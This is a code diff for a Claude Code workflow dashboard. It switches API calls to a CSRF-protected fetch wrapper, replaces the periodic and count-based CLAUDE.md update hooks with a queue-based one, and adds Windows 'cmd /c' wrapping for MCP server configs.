|
||||
|
||||
try {
|
||||
const response = await fetch('/api/codexlens/semantic/install', {
|
||||
const response = await csrfFetch('/api/codexlens/semantic/install', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({})
|
||||
|
||||
@@ -49,43 +49,17 @@ const HOOK_TEMPLATES = {
|
||||
description: 'Auto-update code index when files are written or edited',
|
||||
category: 'indexing'
|
||||
},
|
||||
'memory-update-related': {
|
||||
'memory-update-queue': {
|
||||
event: 'Stop',
|
||||
matcher: '',
|
||||
command: 'bash',
|
||||
args: ['-c', 'ccw tool exec update_module_claude \'{"strategy":"related","tool":"gemini"}\''],
|
||||
description: 'Update CLAUDE.md for changed modules when session ends',
|
||||
args: ['-c', 'ccw tool exec memory_queue "{\\"action\\":\\"add\\",\\"path\\":\\"$CLAUDE_PROJECT_DIR\\"}"'],
|
||||
description: 'Queue CLAUDE.md update when session ends (batched by threshold/timeout)',
|
||||
category: 'memory',
|
||||
configurable: true,
|
||||
config: {
|
||||
tool: { type: 'select', options: ['gemini', 'qwen', 'codex'], default: 'gemini', label: 'CLI Tool' },
|
||||
strategy: { type: 'select', options: ['related', 'single-layer'], default: 'related', label: 'Strategy' }
|
||||
}
|
||||
},
|
||||
'memory-update-periodic': {
|
||||
event: 'PostToolUse',
|
||||
matcher: 'Write|Edit',
|
||||
command: 'bash',
|
||||
args: ['-c', 'INTERVAL=300; LAST_FILE="$HOME/.claude/.last_memory_update"; mkdir -p "$HOME/.claude"; NOW=$(date +%s); LAST=0; [ -f "$LAST_FILE" ] && LAST=$(cat "$LAST_FILE" 2>/dev/null || echo 0); if [ $((NOW - LAST)) -ge $INTERVAL ]; then echo $NOW > "$LAST_FILE"; ccw tool exec update_module_claude \'{"strategy":"related","tool":"gemini"}\' & fi'],
|
||||
description: 'Periodically update CLAUDE.md (default: 5 min interval)',
|
||||
category: 'memory',
|
||||
configurable: true,
|
||||
config: {
|
||||
tool: { type: 'select', options: ['gemini', 'qwen', 'codex'], default: 'gemini', label: 'CLI Tool' },
|
||||
interval: { type: 'number', default: 300, min: 60, max: 3600, label: 'Interval (seconds)', step: 60 }
|
||||
}
|
||||
},
|
||||
'memory-update-count-based': {
|
||||
event: 'PostToolUse',
|
||||
matcher: 'Write|Edit',
|
||||
command: 'bash',
|
||||
args: ['-c', 'THRESHOLD=10; COUNT_FILE="$HOME/.claude/.memory_update_count"; mkdir -p "$HOME/.claude"; INPUT=$(cat); FILE_PATH=$(echo "$INPUT" | jq -r ".tool_input.file_path // .tool_input.path // empty" 2>/dev/null); [ -z "$FILE_PATH" ] && exit 0; COUNT=0; [ -f "$COUNT_FILE" ] && COUNT=$(cat "$COUNT_FILE" 2>/dev/null || echo 0); COUNT=$((COUNT + 1)); echo $COUNT > "$COUNT_FILE"; if [ $COUNT -ge $THRESHOLD ]; then echo 0 > "$COUNT_FILE"; ccw tool exec update_module_claude \'{"strategy":"related","tool":"gemini"}\' & fi'],
|
||||
description: 'Update CLAUDE.md when file changes reach threshold (default: 10 files)',
|
||||
category: 'memory',
|
||||
configurable: true,
|
||||
config: {
|
||||
tool: { type: 'select', options: ['gemini', 'qwen', 'codex'], default: 'gemini', label: 'CLI Tool' },
|
||||
threshold: { type: 'number', default: 10, min: 3, max: 50, label: 'File count threshold', step: 1 }
|
||||
threshold: { type: 'number', default: 5, min: 1, max: 20, label: 'Threshold (paths)', step: 1 },
|
||||
timeout: { type: 'number', default: 300, min: 60, max: 1800, label: 'Timeout (seconds)', step: 60 }
|
||||
}
|
||||
},
|
||||
// SKILL Context Loader templates
|
||||
@@ -210,33 +184,19 @@ const HOOK_TEMPLATES = {
|
||||
const WIZARD_TEMPLATES = {
|
||||
'memory-update': {
|
||||
name: 'Memory Update Hook',
|
||||
description: 'Automatically update CLAUDE.md documentation based on code changes',
|
||||
description: 'Queue-based CLAUDE.md updates with configurable threshold and timeout',
|
||||
icon: 'brain',
|
||||
options: [
|
||||
{
|
||||
id: 'on-stop',
|
||||
name: 'On Session End',
|
||||
description: 'Update documentation when Claude session ends',
|
||||
templateId: 'memory-update-related'
|
||||
},
|
||||
{
|
||||
id: 'periodic',
|
||||
name: 'Periodic Update',
|
||||
description: 'Update documentation at regular intervals during session',
|
||||
templateId: 'memory-update-periodic'
|
||||
},
|
||||
{
|
||||
id: 'count-based',
|
||||
name: 'Count-Based Update',
|
||||
description: 'Update documentation when file changes reach threshold',
|
||||
templateId: 'memory-update-count-based'
|
||||
id: 'queue',
|
||||
name: 'Queue-Based Update',
|
||||
description: 'Batch updates when threshold reached or timeout expires',
|
||||
templateId: 'memory-update-queue'
|
||||
}
|
||||
],
|
||||
configFields: [
|
||||
{ key: 'tool', type: 'select', label: 'CLI Tool', options: ['gemini', 'qwen', 'codex'], default: 'gemini', description: 'Tool for documentation generation' },
|
||||
{ key: 'interval', type: 'number', label: 'Interval (seconds)', default: 300, min: 60, max: 3600, step: 60, showFor: ['periodic'], description: 'Time between updates' },
|
||||
{ key: 'threshold', type: 'number', label: 'File Count Threshold', default: 10, min: 3, max: 50, step: 1, showFor: ['count-based'], description: 'Number of file changes to trigger update' },
|
||||
{ key: 'strategy', type: 'select', label: 'Update Strategy', options: ['related', 'single-layer'], default: 'related', description: 'Related: changed modules, Single-layer: current directory' }
|
||||
{ key: 'threshold', type: 'number', label: 'Threshold (paths)', default: 5, min: 1, max: 20, step: 1, description: 'Number of paths to trigger batch update' },
|
||||
{ key: 'timeout', type: 'number', label: 'Timeout (seconds)', default: 300, min: 60, max: 1800, step: 60, description: 'Auto-flush queue after this time' }
|
||||
]
|
||||
},
|
||||
'skill-context': {
|
||||
@@ -449,7 +409,7 @@ async function saveHook(scope, event, hookData) {
|
||||
// Convert to Claude Code format before saving
|
||||
const convertedHookData = convertToClaudeCodeFormat(hookData);
|
||||
|
||||
const response = await fetch('/api/hooks', {
|
||||
const response = await csrfFetch('/api/hooks', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
@@ -478,7 +438,7 @@ async function saveHook(scope, event, hookData) {
|
||||
|
||||
async function removeHook(scope, event, hookIndex) {
|
||||
try {
|
||||
const response = await fetch('/api/hooks', {
|
||||
const response = await csrfFetch('/api/hooks', {
|
||||
method: 'DELETE',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
@@ -730,9 +690,7 @@ function renderWizardModalContent() {
|
||||
// Helper to get translated option names
|
||||
const getOptionName = (optId) => {
|
||||
if (wizardId === 'memory-update') {
|
||||
if (optId === 'on-stop') return t('hook.wizard.onSessionEnd');
|
||||
if (optId === 'periodic') return t('hook.wizard.periodicUpdate');
|
||||
if (optId === 'count-based') return t('hook.wizard.countBasedUpdate');
|
||||
if (optId === 'queue') return t('hook.wizard.queueBasedUpdate') || 'Queue-Based Update';
|
||||
}
|
||||
if (wizardId === 'memory-setup') {
|
||||
if (optId === 'file-read') return t('hook.wizard.fileReadTracker');
|
||||
@@ -748,9 +706,7 @@ function renderWizardModalContent() {
|
||||
|
||||
const getOptionDesc = (optId) => {
|
||||
if (wizardId === 'memory-update') {
|
||||
if (optId === 'on-stop') return t('hook.wizard.onSessionEndDesc');
|
||||
if (optId === 'periodic') return t('hook.wizard.periodicUpdateDesc');
|
||||
if (optId === 'count-based') return t('hook.wizard.countBasedUpdateDesc');
|
||||
if (optId === 'queue') return t('hook.wizard.queueBasedUpdateDesc') || 'Batch updates when threshold reached or timeout expires';
|
||||
}
|
||||
if (wizardId === 'memory-setup') {
|
||||
if (optId === 'file-read') return t('hook.wizard.fileReadTrackerDesc');
|
||||
@@ -767,20 +723,16 @@ function renderWizardModalContent() {
|
||||
// Helper to get translated field labels
|
||||
const getFieldLabel = (fieldKey) => {
|
||||
const labels = {
|
||||
'tool': t('hook.wizard.cliTool'),
|
||||
'interval': t('hook.wizard.intervalSeconds'),
|
||||
'threshold': t('hook.wizard.fileCountThreshold'),
|
||||
'strategy': t('hook.wizard.updateStrategy')
|
||||
'threshold': t('hook.wizard.thresholdPaths') || 'Threshold (paths)',
|
||||
'timeout': t('hook.wizard.timeoutSeconds') || 'Timeout (seconds)'
|
||||
};
|
||||
return labels[fieldKey] || wizard.configFields.find(f => f.key === fieldKey)?.label || fieldKey;
|
||||
};
|
||||
|
||||
const getFieldDesc = (fieldKey) => {
|
||||
const descs = {
|
||||
'tool': t('hook.wizard.toolForDocGen'),
|
||||
'interval': t('hook.wizard.timeBetweenUpdates'),
|
||||
'threshold': t('hook.wizard.fileCountThresholdDesc'),
|
||||
'strategy': t('hook.wizard.relatedStrategy')
|
||||
'threshold': t('hook.wizard.thresholdPathsDesc') || 'Number of paths to trigger batch update',
|
||||
'timeout': t('hook.wizard.timeoutSecondsDesc') || 'Auto-flush queue after this time'
|
||||
};
|
||||
return descs[fieldKey] || wizard.configFields.find(f => f.key === fieldKey)?.description || '';
|
||||
};
|
||||
@@ -1154,21 +1106,10 @@ function generateWizardCommand() {
|
||||
}
|
||||
|
||||
// Handle memory-update wizard (default)
|
||||
const tool = wizardConfig.tool || 'gemini';
|
||||
const strategy = wizardConfig.strategy || 'related';
|
||||
const interval = wizardConfig.interval || 300;
|
||||
const threshold = wizardConfig.threshold || 10;
|
||||
|
||||
// Build the ccw tool command based on configuration
|
||||
const params = JSON.stringify({ strategy, tool });
|
||||
|
||||
if (triggerType === 'periodic') {
|
||||
return `INTERVAL=${interval}; LAST_FILE="$HOME/.claude/.last_memory_update"; mkdir -p "$HOME/.claude"; NOW=$(date +%s); LAST=0; [ -f "$LAST_FILE" ] && LAST=$(cat "$LAST_FILE" 2>/dev/null || echo 0); if [ $((NOW - LAST)) -ge $INTERVAL ]; then echo $NOW > "$LAST_FILE"; ccw tool exec update_module_claude '${params}' & fi`;
|
||||
} else if (triggerType === 'count-based') {
|
||||
return `THRESHOLD=${threshold}; COUNT_FILE="$HOME/.claude/.memory_update_count"; mkdir -p "$HOME/.claude"; INPUT=$(cat); FILE_PATH=$(echo "$INPUT" | jq -r ".tool_input.file_path // .tool_input.path // empty" 2>/dev/null); [ -z "$FILE_PATH" ] && exit 0; COUNT=0; [ -f "$COUNT_FILE" ] && COUNT=$(cat "$COUNT_FILE" 2>/dev/null || echo 0); COUNT=$((COUNT + 1)); echo $COUNT > "$COUNT_FILE"; if [ $COUNT -ge $THRESHOLD ]; then echo 0 > "$COUNT_FILE"; ccw tool exec update_module_claude '${params}' & fi`;
|
||||
} else {
|
||||
return `ccw tool exec update_module_claude '${params}'`;
|
||||
}
|
||||
// Now uses memory_queue for batched updates with configurable threshold/timeout
|
||||
// The command adds to queue, configuration is applied separately via submitHookWizard
|
||||
const params = `"{\\"action\\":\\"add\\",\\"path\\":\\"$CLAUDE_PROJECT_DIR\\"}"`;
|
||||
return `ccw tool exec memory_queue ${params}`;
|
||||
}
|
||||
|
||||
async function submitHookWizard() {
|
||||
@@ -1263,6 +1204,26 @@ async function submitHookWizard() {
|
||||
}
|
||||
|
||||
await saveHook(scope, baseTemplate.event, hookData);
|
||||
|
||||
// For memory-update wizard, also configure queue settings
|
||||
if (wizard.id === 'memory-update') {
|
||||
const threshold = wizardConfig.threshold || 5;
|
||||
const timeout = wizardConfig.timeout || 300;
|
||||
try {
|
||||
const configParams = JSON.stringify({ action: 'configure', threshold, timeout });
|
||||
const response = await fetch('/api/tools/execute', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({ tool: 'memory_queue', params: configParams })
|
||||
});
|
||||
if (response.ok) {
|
||||
showRefreshToast(`Queue configured: threshold=${threshold}, timeout=${timeout}s`, 'success');
|
||||
}
|
||||
} catch (e) {
|
||||
console.warn('Failed to configure memory queue:', e);
|
||||
}
|
||||
}
|
||||
|
||||
closeHookWizardModal();
|
||||
}
|
||||
|
||||
|
||||
@@ -252,7 +252,7 @@ async function cleanIndexProject(projectId) {
|
||||
|
||||
// The project ID is the directory name in the index folder
|
||||
// We need to construct the full path or use a clean API
|
||||
const response = await fetch('/api/codexlens/clean', {
|
||||
const response = await csrfFetch('/api/codexlens/clean', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({ projectId: projectId })
|
||||
@@ -282,7 +282,7 @@ async function cleanAllIndexesConfirm() {
|
||||
try {
|
||||
showRefreshToast(t('index.cleaning') || 'Cleaning indexes...', 'info');
|
||||
|
||||
const response = await fetch('/api/codexlens/clean', {
|
||||
const response = await csrfFetch('/api/codexlens/clean', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({ all: true })
|
||||
|
||||
@@ -84,6 +84,147 @@ function getCliMode() {
|
||||
return currentCliMode;
|
||||
}
|
||||
|
||||
// ========== Cross-Platform MCP Helpers ==========
|
||||
|
||||
/**
|
||||
* Build cross-platform MCP server configuration
|
||||
* On Windows, wraps npx/node/python commands with cmd /c for proper execution
|
||||
* @param {string} command - The command to run (e.g., 'npx', 'node', 'python')
|
||||
* @param {string[]} args - Command arguments
|
||||
* @param {object} [options] - Additional options (env, type, etc.)
|
||||
* @returns {object} MCP server configuration
|
||||
*/
|
||||
function buildCrossPlatformMcpConfig(command, args = [], options = {}) {
|
||||
const { env, type, ...rest } = options;
|
||||
|
||||
// Commands that need cmd /c wrapper on Windows
|
||||
const windowsWrappedCommands = ['npx', 'npm', 'node', 'python', 'python3', 'pip', 'pip3', 'pnpm', 'yarn', 'bun'];
|
||||
const needsWindowsWrapper = isWindowsPlatform && windowsWrappedCommands.includes(command.toLowerCase());
|
||||
|
||||
const config = needsWindowsWrapper
|
||||
? { command: 'cmd', args: ['/c', command, ...args] }
|
||||
: { command, args };
|
||||
|
||||
// Add optional fields
|
||||
if (type) config.type = type;
|
||||
if (env && Object.keys(env).length > 0) config.env = env;
|
||||
Object.assign(config, rest);
|
||||
|
||||
return config;
|
||||
}
|
||||
|
||||
/**
|
||||
* Check if MCP config needs Windows cmd /c wrapper
|
||||
* @param {object} serverConfig - MCP server configuration
|
||||
* @returns {object} { needsWrapper: boolean, command: string }
|
||||
*/
|
||||
function checkWindowsMcpCompatibility(serverConfig) {
|
||||
if (!isWindowsPlatform) return { needsWrapper: false };
|
||||
|
||||
const command = serverConfig.command?.toLowerCase() || '';
|
||||
const windowsWrappedCommands = ['npx', 'npm', 'node', 'python', 'python3', 'pip', 'pip3', 'pnpm', 'yarn', 'bun'];
|
||||
|
||||
// Already wrapped with cmd
|
||||
if (command === 'cmd') return { needsWrapper: false };
|
||||
|
||||
const needsWrapper = windowsWrappedCommands.includes(command);
|
||||
return { needsWrapper, command: serverConfig.command };
|
||||
}
|
||||
|
||||
/**
|
||||
* Auto-fix MCP config for Windows platform
|
||||
* @param {object} serverConfig - Original MCP server configuration
|
||||
* @returns {object} Fixed configuration (or original if no fix needed)
|
||||
*/
|
||||
function autoFixWindowsMcpConfig(serverConfig) {
|
||||
const { needsWrapper, command } = checkWindowsMcpCompatibility(serverConfig);
|
||||
|
||||
if (!needsWrapper) return serverConfig;
|
||||
|
||||
// Create new config with cmd /c wrapper
|
||||
const fixedConfig = {
|
||||
...serverConfig,
|
||||
command: 'cmd',
|
||||
args: ['/c', command, ...(serverConfig.args || [])]
|
||||
};
|
||||
|
||||
return fixedConfig;
|
||||
}
|
||||
|
||||
/**
|
||||
* Show Windows compatibility warning for MCP config
|
||||
* @param {string} serverName - Name of the MCP server
|
||||
* @param {object} serverConfig - MCP server configuration
|
||||
* @returns {Promise<boolean>} True if user confirms auto-fix, false to keep original
|
||||
*/
|
||||
async function showWindowsMcpCompatibilityWarning(serverName, serverConfig) {
|
||||
const { needsWrapper, command } = checkWindowsMcpCompatibility(serverConfig);
|
||||
|
||||
if (!needsWrapper) return false;
|
||||
|
||||
// Show warning toast with auto-fix option
|
||||
const message = t('mcp.windows.compatibilityWarning', {
|
||||
name: serverName,
|
||||
command: command
|
||||
});
|
||||
|
||||
return new Promise((resolve) => {
|
||||
// Create custom toast with action buttons
|
||||
const toastContainer = document.getElementById('refreshToast') || createToastContainer();
|
||||
const toastId = `windows-mcp-warning-${Date.now()}`;
|
||||
|
||||
const toastHtml = `
|
||||
<div id="${toastId}" class="fixed bottom-4 right-4 bg-warning text-warning-foreground p-4 rounded-lg shadow-lg max-w-md z-50 animate-slide-up">
|
||||
<div class="flex items-start gap-3">
|
||||
<i data-lucide="alert-triangle" class="w-5 h-5 flex-shrink-0 mt-0.5"></i>
|
||||
<div class="flex-1">
|
||||
<p class="font-medium mb-2">${t('mcp.windows.title')}</p>
|
||||
<p class="text-sm opacity-90 mb-3">${message}</p>
|
||||
<div class="flex gap-2">
|
||||
<button class="px-3 py-1.5 text-sm bg-background text-foreground rounded hover:opacity-90"
|
||||
onclick="document.getElementById('${toastId}').remove(); window._mcpWindowsResolve && window._mcpWindowsResolve(true)">
|
||||
${t('mcp.windows.autoFix')}
|
||||
</button>
|
||||
<button class="px-3 py-1.5 text-sm border border-current rounded hover:opacity-90"
|
||||
onclick="document.getElementById('${toastId}').remove(); window._mcpWindowsResolve && window._mcpWindowsResolve(false)">
|
||||
${t('mcp.windows.keepOriginal')}
|
||||
</button>
|
||||
</div>
|
||||
</div>
|
||||
<button onclick="document.getElementById('${toastId}').remove(); window._mcpWindowsResolve && window._mcpWindowsResolve(false)"
|
||||
class="text-current opacity-70 hover:opacity-100">
|
||||
<i data-lucide="x" class="w-4 h-4"></i>
|
||||
</button>
|
||||
</div>
|
||||
</div>
|
||||
`;
|
||||
|
||||
// Store resolve function globally for button clicks
|
||||
window._mcpWindowsResolve = (result) => {
|
||||
delete window._mcpWindowsResolve;
|
||||
resolve(result);
|
||||
};
|
||||
|
||||
document.body.insertAdjacentHTML('beforeend', toastHtml);
|
||||
|
||||
// Initialize icons
|
||||
if (typeof lucide !== 'undefined') {
|
||||
lucide.createIcons();
|
||||
}
|
||||
|
||||
// Auto-dismiss after 15 seconds (keep original)
|
||||
setTimeout(() => {
|
||||
const toast = document.getElementById(toastId);
|
||||
if (toast) {
|
||||
toast.remove();
|
||||
if (window._mcpWindowsResolve) {
|
||||
window._mcpWindowsResolve(false);
|
||||
}
|
||||
}
|
||||
}, 15000);
|
||||
});
|
||||
}
|
||||
|
||||
// ========== Codex MCP Functions ==========
|
||||
|
||||
/**
|
||||
@@ -91,7 +232,7 @@ function getCliMode() {
|
||||
*/
|
||||
async function addCodexMcpServer(serverName, serverConfig) {
|
||||
try {
|
||||
const response = await fetch('/api/codex-mcp-add', {
|
||||
const response = await csrfFetch('/api/codex-mcp-add', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
@@ -123,7 +264,7 @@ async function addCodexMcpServer(serverName, serverConfig) {
|
||||
*/
|
||||
async function removeCodexMcpServer(serverName) {
|
||||
try {
|
||||
const response = await fetch('/api/codex-mcp-remove', {
|
||||
const response = await csrfFetch('/api/codex-mcp-remove', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({ serverName })
|
||||
@@ -152,7 +293,7 @@ async function removeCodexMcpServer(serverName) {
|
||||
*/
|
||||
async function toggleCodexMcpServer(serverName, enabled) {
|
||||
try {
|
||||
const response = await fetch('/api/codex-mcp-toggle', {
|
||||
const response = await csrfFetch('/api/codex-mcp-toggle', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({ serverName, enabled })
|
||||
@@ -205,7 +346,7 @@ async function copyCodexServerToClaude(serverName, serverConfig) {
|
||||
|
||||
async function toggleMcpServer(serverName, enable) {
|
||||
try {
|
||||
const response = await fetch('/api/mcp-toggle', {
|
||||
const response = await csrfFetch('/api/mcp-toggle', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
@@ -239,7 +380,7 @@ async function copyMcpServerToProject(serverName, serverConfig, configType = nul
|
||||
configType = preferredProjectConfigType;
|
||||
}
|
||||
|
||||
const response = await fetch('/api/mcp-copy-server', {
|
||||
const response = await csrfFetch('/api/mcp-copy-server', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
@@ -316,7 +457,7 @@ function showConfigTypeDialog() {
|
||||
|
||||
async function removeMcpServerFromProject(serverName) {
|
||||
try {
|
||||
const response = await fetch('/api/mcp-remove-server', {
|
||||
const response = await csrfFetch('/api/mcp-remove-server', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
@@ -343,7 +484,7 @@ async function removeMcpServerFromProject(serverName) {
|
||||
|
||||
async function addGlobalMcpServer(serverName, serverConfig) {
|
||||
try {
|
||||
const response = await fetch('/api/mcp-add-global-server', {
|
||||
const response = await csrfFetch('/api/mcp-add-global-server', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
@@ -370,7 +511,7 @@ async function addGlobalMcpServer(serverName, serverConfig) {
|
||||
|
||||
async function removeGlobalMcpServer(serverName) {
|
||||
try {
|
||||
const response = await fetch('/api/mcp-remove-global-server', {
|
||||
const response = await csrfFetch('/api/mcp-remove-global-server', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
@@ -809,7 +950,7 @@ async function submitMcpCreateFromJson() {
|
||||
|
||||
for (const [name, config] of Object.entries(servers)) {
|
||||
try {
|
||||
const response = await fetch('/api/mcp-copy-server', {
|
||||
const response = await csrfFetch('/api/mcp-copy-server', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
@@ -847,6 +988,19 @@ async function submitMcpCreateFromJson() {
|
||||
}
|
||||
|
||||
async function createMcpServerWithConfig(name, serverConfig, scope = 'project') {
|
||||
// Check Windows compatibility and offer auto-fix if needed
|
||||
const { needsWrapper } = checkWindowsMcpCompatibility(serverConfig);
|
||||
let finalConfig = serverConfig;
|
||||
|
||||
if (needsWrapper) {
|
||||
// Show warning and ask user whether to auto-fix
|
||||
const shouldAutoFix = await showWindowsMcpCompatibilityWarning(name, serverConfig);
|
||||
if (shouldAutoFix) {
|
||||
finalConfig = autoFixWindowsMcpConfig(serverConfig);
|
||||
console.log('[MCP] Auto-fixed config for Windows:', finalConfig);
|
||||
}
|
||||
}
|
||||
|
||||
// Submit to API
|
||||
try {
|
||||
let response;
|
||||
@@ -854,33 +1008,33 @@ async function createMcpServerWithConfig(name, serverConfig, scope = 'project')
|
||||
|
||||
if (scope === 'codex') {
|
||||
// Create in Codex config.toml
|
||||
response = await fetch('/api/codex-mcp-add', {
|
||||
response = await csrfFetch('/api/codex-mcp-add', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
serverName: name,
|
||||
serverConfig: serverConfig
|
||||
serverConfig: finalConfig
|
||||
})
|
||||
});
|
||||
scopeLabel = 'Codex';
|
||||
} else if (scope === 'global') {
|
||||
response = await fetch('/api/mcp-add-global-server', {
|
||||
response = await csrfFetch('/api/mcp-add-global-server', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
serverName: name,
|
||||
serverConfig: serverConfig
|
||||
serverConfig: finalConfig
|
||||
})
|
||||
});
|
||||
scopeLabel = 'global';
|
||||
} else {
|
||||
response = await fetch('/api/mcp-copy-server', {
|
||||
response = await csrfFetch('/api/mcp-copy-server', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
projectPath: projectPath,
|
||||
serverName: name,
|
||||
serverConfig: serverConfig
|
||||
serverConfig: finalConfig
|
||||
})
|
||||
});
|
||||
scopeLabel = 'project';
|
||||
@@ -1006,7 +1160,7 @@ async function installCcwToolsMcp(scope = 'workspace') {
|
||||
|
||||
if (scope === 'global') {
|
||||
// Install to global (~/.claude.json mcpServers)
|
||||
const response = await fetch('/api/mcp-add-global-server', {
|
||||
const response = await csrfFetch('/api/mcp-add-global-server', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
@@ -1028,7 +1182,7 @@ async function installCcwToolsMcp(scope = 'workspace') {
|
||||
} else {
|
||||
// Install to workspace (use preferredProjectConfigType)
|
||||
const configType = preferredProjectConfigType;
|
||||
const response = await fetch('/api/mcp-copy-server', {
|
||||
const response = await csrfFetch('/api/mcp-copy-server', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
@@ -1074,7 +1228,7 @@ async function updateCcwToolsMcp(scope = 'workspace') {
|
||||
|
||||
if (scope === 'global') {
|
||||
// Update global (~/.claude.json mcpServers)
|
||||
const response = await fetch('/api/mcp-add-global-server', {
|
||||
const response = await csrfFetch('/api/mcp-add-global-server', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
@@ -1096,7 +1250,7 @@ async function updateCcwToolsMcp(scope = 'workspace') {
|
||||
} else {
|
||||
// Update workspace (use preferredProjectConfigType)
|
||||
const configType = preferredProjectConfigType;
|
||||
const response = await fetch('/api/mcp-copy-server', {
|
||||
const response = await csrfFetch('/api/mcp-copy-server', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
@@ -1231,16 +1385,14 @@ const RECOMMENDED_MCP_SERVERS = [
|
||||
descKey: 'mcp.ace-tool.field.token.desc'
|
||||
}
|
||||
],
|
||||
buildConfig: (values) => ({
|
||||
command: 'npx',
|
||||
args: [
|
||||
'ace-tool',
|
||||
'--base-url',
|
||||
values.baseUrl || 'https://acemcp.heroman.wtf/relay/',
|
||||
'--token',
|
||||
values.token
|
||||
]
|
||||
})
|
||||
// Uses buildCrossPlatformMcpConfig for automatic Windows cmd /c wrapping
|
||||
buildConfig: (values) => buildCrossPlatformMcpConfig('npx', [
|
||||
'ace-tool',
|
||||
'--base-url',
|
||||
values.baseUrl || 'https://acemcp.heroman.wtf/relay/',
|
||||
'--token',
|
||||
values.token
|
||||
])
|
||||
},
|
||||
{
|
||||
id: 'chrome-devtools',
|
||||
@@ -1249,12 +1401,8 @@ const RECOMMENDED_MCP_SERVERS = [
|
||||
icon: 'chrome',
|
||||
category: 'browser',
|
||||
fields: [],
|
||||
buildConfig: () => ({
|
||||
type: 'stdio',
|
||||
command: 'npx',
|
||||
args: ['chrome-devtools-mcp@latest'],
|
||||
env: {}
|
||||
})
|
||||
// Uses buildCrossPlatformMcpConfig for automatic Windows cmd /c wrapping
|
||||
buildConfig: () => buildCrossPlatformMcpConfig('npx', ['chrome-devtools-mcp@latest'], { type: 'stdio' })
|
||||
},
|
||||
{
|
||||
id: 'exa',
|
||||
@@ -1273,16 +1421,10 @@ const RECOMMENDED_MCP_SERVERS = [
|
||||
descKey: 'mcp.exa.field.apiKey.desc'
|
||||
}
|
||||
],
|
||||
// Uses buildCrossPlatformMcpConfig for automatic Windows cmd /c wrapping
|
||||
buildConfig: (values) => {
|
||||
const config = {
|
||||
command: 'npx',
|
||||
args: ['-y', 'exa-mcp-server']
|
||||
};
|
||||
// Only add env if API key is provided
|
||||
if (values.apiKey) {
|
||||
config.env = { EXA_API_KEY: values.apiKey };
|
||||
}
|
||||
return config;
|
||||
const env = values.apiKey ? { EXA_API_KEY: values.apiKey } : undefined;
|
||||
return buildCrossPlatformMcpConfig('npx', ['-y', 'exa-mcp-server'], { env });
|
||||
}
|
||||
}
|
||||
];
|
||||
|
||||
@@ -415,10 +415,15 @@ function handleNotification(data) {
|
||||
'CodexLens'
|
||||
);
|
||||
}
|
||||
// Invalidate CodexLens page cache to ensure fresh data on next visit
|
||||
// Invalidate all CodexLens related caches to ensure fresh data on refresh
|
||||
// Must clear both codexlens-specific cache AND global status cache
|
||||
if (window.cacheManager) {
|
||||
window.cacheManager.invalidate('all-status');
|
||||
window.cacheManager.invalidate('dashboard-init');
|
||||
}
|
||||
if (typeof window.invalidateCodexLensCache === 'function') {
|
||||
window.invalidateCodexLensCache();
|
||||
console.log('[CodexLens] Cache invalidated after installation');
|
||||
console.log('[CodexLens] All caches invalidated after installation');
|
||||
}
|
||||
// Refresh CLI status if active
|
||||
if (typeof loadCodexLensStatus === 'function') {
|
||||
@@ -443,10 +448,15 @@ function handleNotification(data) {
|
||||
'CodexLens'
|
||||
);
|
||||
}
|
||||
// Invalidate CodexLens page cache to ensure fresh data on next visit
|
||||
// Invalidate all CodexLens related caches to ensure fresh data on refresh
|
||||
// Must clear both codexlens-specific cache AND global status cache
|
||||
if (window.cacheManager) {
|
||||
window.cacheManager.invalidate('all-status');
|
||||
window.cacheManager.invalidate('dashboard-init');
|
||||
}
|
||||
if (typeof window.invalidateCodexLensCache === 'function') {
|
||||
window.invalidateCodexLensCache();
|
||||
console.log('[CodexLens] Cache invalidated after uninstallation');
|
||||
console.log('[CodexLens] All caches invalidated after uninstallation');
|
||||
}
|
||||
// Refresh CLI status if active
|
||||
if (typeof loadCodexLensStatus === 'function') {
|
||||
|
||||
@@ -415,7 +415,7 @@ async function cleanProjectStorage(projectId) {
|
||||
}
|
||||
|
||||
try {
|
||||
const res = await fetch('/api/storage/clean', {
|
||||
const res = await csrfFetch('/api/storage/clean', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({ projectId })
|
||||
